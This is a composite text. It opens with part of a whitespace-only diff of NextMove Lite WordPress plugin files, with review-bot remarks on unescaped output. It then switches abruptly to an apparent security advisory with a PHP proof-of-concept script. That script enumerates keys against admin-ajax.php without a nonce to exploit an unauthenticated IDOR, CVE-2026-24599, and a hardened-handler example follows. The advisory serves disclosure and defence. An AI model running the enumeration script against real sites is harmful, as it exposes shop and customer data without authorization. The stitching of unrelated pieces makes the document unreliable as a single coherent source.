+            <tr>
+                <td>4.</td>
+                <td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
+            </tr>
+            <tr>
+                <td>5.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
+<?php
+return ob_get_clean();
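Review bot: `echo $config['slug']` in the `id` attribute and `echo $config['title']` in the `<h3>` are still unescaped after this full-file reindent; add `esc_attr()`/`esc_html()`. Whitespace-only rewrites of entire files (here tabs to four spaces on every line) also make `git blame` and review harder; keep them in a separate formatting commit.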
--- a/woo-thank-you-page-nextmove-lite/components/map/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/map/instance.php
@@ -5,9 +5,9 @@
 class XLWCTY_Shipping_Billing_Based_Map extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
-	public $map_add          = '';
-	public $is_disable       = false;
+	public $viewpath = '';
+	public $map_add = '';
+	public $is_disable = false;

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/map/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/map/views/view.php
@@ -19,21 +19,21 @@

 ?>
 <div class="xlwcty_Box xlwcty_Map">
-	<div class="xlwcty_mapDiv xlwcty-map-component" data-address='<?php echo esc_attr( $this->data->map_add ); ?>' data-zoom-level='<?php echo esc_attr( $default_zoom ); ?>'
-		data-nm-icon="<?php echo esc_attr( $this->data->icon ); ?>" data-style="<?php echo esc_attr( $this->data->style ? $this->data->style : 'standard' ); ?>"
-		data-marker-text="
+    <div class="xlwcty_mapDiv xlwcty-map-component" data-address='<?php echo esc_attr( $this->data->map_add ); ?>' data-zoom-level='<?php echo esc_attr( $default_zoom ); ?>'
+         data-nm-icon="<?php echo esc_attr( $this->data->icon ); ?>" data-style="<?php echo esc_attr( $this->data->style ? $this->data->style : 'standard' ); ?>"
+         data-marker-text="
 		<?php
-			$marker_text_parsed = apply_filters( 'xlwcty_the_content', $this->data->marker_text );
-			echo esc_attr( wp_strip_all_tags( $marker_text_parsed ) );
-		?>
+	     $marker_text_parsed = apply_filters( 'xlwcty_the_content', $this->data->marker_text );
+	     echo esc_attr( wp_strip_all_tags( $marker_text_parsed ) );
+	     ?>
 		">
 		<?php
 		if ( empty( $is_google_key_exist ) ) {
-            echo '<div class="xlwcty_map_error_txt">' . esc_html__( 'Google Map API Key is missing.', 'woo-thank-you-page-nextmove-lite' ) . '</div>';
+			echo '<div class="xlwcty_map_error_txt">' . esc_html__( 'Google Map API Key is missing.', 'woo-thank-you-page-nextmove-lite' ) . '</div>';
 		}
 		?>
-	</div>
-	<div class="xlwcty_content">
+    </div>
+    <div class="xlwcty_content">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
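Review bot: the `data-marker-text` attribute is built across five source lines, so its value includes the newlines and indentation around the embedded `<?php ... ?>` block, and the new `$marker_text_parsed = ...` and `echo esc_attr( ... )` lines are indented with a tab followed by five spaces while the attribute lines above them use spaces only. Compute `$marker_text_parsed` before the `?>` at the top of the file and echo it inline (`data-marker-text="<?php echo esc_attr( wp_strip_all_tags( $marker_text_parsed ) ); ?>"`), which removes both problems.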
@@ -44,5 +44,5 @@
 		$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 		echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 		?>
-	</div>
+    </div>
 </div>
--- a/woo-thank-you-page-nextmove-lite/components/order-acknowledge/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/order-acknowledge/help.php
@@ -1,26 +1,26 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/order-acknowledge/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Icon:</strong> Select 'Built-in' option to choose from available icons with color. 'Custom' option to upload your own icon. And 'none' option for no icon.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Heading:</strong> Enter any Heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Sub Heading</strong> Enter any Sub-Heading. Customize font size and text alignment too.</td>
-			</tr>
-
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/order-acknowledge/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Icon:</strong> Select 'Built-in' option to choose from available icons with color. 'Custom' option to upload your own icon. And 'none' option for no icon.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Heading:</strong> Enter any Heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Sub Heading</strong> Enter any Sub-Heading. Customize font size and text alignment too.</td>
+            </tr>
+
+        </table>
+    </div>
+<?php
+return ob_get_clean();
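Review bot: the third row's label `<strong>Sub Heading</strong>` lacks the colon the other rows use (`<strong>Heading:</strong>`), and there is a stray blank line between the last `</tr>` and `</table>`; both survive the reindent. `echo $config['slug']` in the `id` attribute and `echo $config['title']` in `<h3>` are also unescaped, as in the other help.php files in this patch; wrap them in `esc_attr()`/`esc_html()`.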
--- a/woo-thank-you-page-nextmove-lite/components/order-acknowledge/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/order-acknowledge/instance.php
@@ -5,19 +5,19 @@
 class XLWCTY_Content_Order_Acknowledge extends XLWCTY_Component {

 	private static $instance = null;
-	public $is_disable       = false;
-	public $viewpath         = '';
-	public $source           = '';
-	public $height           = '';
-	public $width            = '';
-	public $heading1         = '';
-	public $heading1_color   = '';
-	public $heading1_font    = '';
-	public $heading2         = '';
-	public $heading2_color   = '';
-	public $heading2_font    = '';
-	public $icon_type        = '';
-	public $icon_html        = '';
+	public $is_disable = false;
+	public $viewpath = '';
+	public $source = '';
+	public $height = '';
+	public $width = '';
+	public $heading1 = '';
+	public $heading1_color = '';
+	public $heading1_font = '';
+	public $heading2 = '';
+	public $heading2_color = '';
+	public $heading2_font = '';
+	public $icon_type = '';
+	public $icon_html = '';

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/order-acknowledge/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/order-acknowledge/views/view.php
@@ -3,7 +3,7 @@

 XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
 ?>
-	<div class="xlwcty_order_info">
+    <div class="xlwcty_order_info">
 		<?php
 		echo $this->icon_html ? wp_kses_post( $this->icon_html ) : '';
 		$heading1_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
@@ -11,5 +11,5 @@
 		$heading2_parsed = $this->data->heading2 ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading2 ) : '';
 		echo $heading2_parsed

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24599 - NextMove Lite <= 2.23.0 - Unauthenticated Insecure Direct Object Reference

$target_url = "http://vulnerable-wordpress-site.com/wp-admin/admin-ajax.php";

// The vulnerable AJAX action
$action = "xlwcty_get_page";

// Test with different key values to enumerate objects
$test_keys = [
    "order_123",
    "page_456",
    "customer_789",
    "settings_global",
    "template_default"
];

echo "Testing CVE-2026-24599 on: " . $target_url . "nn";

foreach ($test_keys as $key) {
    $post_data = [
        'action' => $action,
        'key' => $key,
        '_ajax_nonce' => '' // Nonce is not required due to the vulnerability
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    // Set headers to mimic legitimate browser request
    $headers = [
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'Accept-Language: en-US,en;q=0.5',
        'Accept-Encoding: gzip, deflate',
        'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
        'X-Requested-With: XMLHttpRequest',
        'Connection: close'
    ];
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    
    echo "Testing key: " . $key . "n";
    echo "HTTP Code: " . $http_code . "n";
    
    if ($response !== false) {
        if (strpos($response, 'error') !== false || strpos($response, 'invalid') !== false) {
            echo "Result: Invalid key or error responsen";
        } else if (!empty(trim($response))) {
            echo "Result: POTENTIALLY VULNERABLE - Received data for keyn";
            echo "Response preview: " . substr($response, 0, 200) . "...n";
        } else {
            echo "Result: Empty responsen";
        }
    } else {
        echo "Result: Request failed - " . curl_error($ch) . "n";
    }
    
    echo "n";
    curl_close($ch);
    
    // Small delay between requests
    sleep(1);
}

echo "Exploitation test complete. If any key returned data without authentication,n";
echo "the site is vulnerable to CVE-2026-24599.n";

?>
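The PoC above only shows the client side: an arbitrary `key` sent to a handler that resolves it for anyone. The following is an added example, not NextMove Lite code and not taken from the plugin's patch, showing the server-side check that is missing in an IDOR of this kind beside a handler that has it. The `OBJECTS` store, the owner ids and the `user_can()` function are hypothetical stand-ins for the plugin's own lookups and for WordPress's `current_user_can()`, so the file runs with plain `php` and no WordPress install.

```php
<?php
// Added example, not NextMove Lite code: object-level authorization for a
// handler that resolves a user-supplied `key`, beside the shape that lacks it.
// OBJECTS, user_can() and the owner ids are hypothetical stand-ins for the
// plugin's lookups and for current_user_can().
declare(strict_types=1);

// Hypothetical store: key => owner user id and the content the key resolves to.
const OBJECTS = [
    'order_123' => ['owner' => 7, 'data' => 'order #123 summary'],
    'page_456'  => ['owner' => 9, 'data' => 'thank-you page 456'],
];

// Stand-in for current_user_can(): user 1 is a shop manager, 7 and 9 are customers.
function user_can(int $user_id, string $cap): bool
{
    $caps = [1 => ['manage_woocommerce', 'read'], 7 => ['read'], 9 => ['read']];
    return in_array($cap, $caps[$user_id] ?? [], true);
}

// IDOR shape: whatever key arrives is resolved, regardless of who asks.
// With a nopriv hook, "who asks" can be nobody at all (user id 0).
function get_page_vulnerable(array $request): array
{
    $objects = OBJECTS;
    $key = (string) ($request['key'] ?? '');
    return isset($objects[$key])
        ? ['ok' => true, 'data' => $objects[$key]['data']]
        : ['ok' => false, 'error' => 'not found'];
}

// Hardened shape: refuse anonymous callers (no nopriv hook), validate the key
// format, then require ownership or an explicit capability. Missing and
// foreign objects return the same error so the endpoint is not an existence oracle.
function get_page_hardened(array $request, int $current_user_id): array
{
    if ($current_user_id === 0) {
        return ['ok' => false, 'error' => 'forbidden'];
    }
    $key = (string) ($request['key'] ?? '');
    if (!preg_match('/^[a-z]+_[0-9]{1,10}$/', $key)) {
        return ['ok' => false, 'error' => 'bad request'];
    }
    $objects = OBJECTS;
    $object = $objects[$key] ?? null;
    $allowed = $object !== null
        && ($object['owner'] === $current_user_id
            || user_can($current_user_id, 'manage_woocommerce'));
    if (!$allowed) {
        return ['ok' => false, 'error' => 'not found'];
    }
    return ['ok' => true, 'data' => $object['data']];
}

// Self-check when run directly: only the owner and the manager get data back.
$cases = [
    ['vulnerable, anonymous', get_page_vulnerable(['key' => 'order_123'])],
    ['hardened, anonymous',   get_page_hardened(['key' => 'order_123'], 0)],
    ['hardened, other user',  get_page_hardened(['key' => 'order_123'], 9)],
    ['hardened, owner',       get_page_hardened(['key' => 'order_123'], 7)],
    ['hardened, manager',     get_page_hardened(['key' => 'order_123'], 1)],
    ['hardened, bad key',     get_page_hardened(['key' => '../wp-config'], 7)],
];
foreach ($cases as [$label, $result]) {
    printf("%-24s %s\n", $label, json_encode($result));
}
```

In a real plugin the same three steps map onto WordPress primitives: register the handler on `wp_ajax_<action>` only (no `wp_ajax_nopriv_` twin), call `check_ajax_referer()` so the request must carry a valid nonce, and call `current_user_can()` or compare the resolved object's owner against `get_current_user_id()` before returning anything derived from the key.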
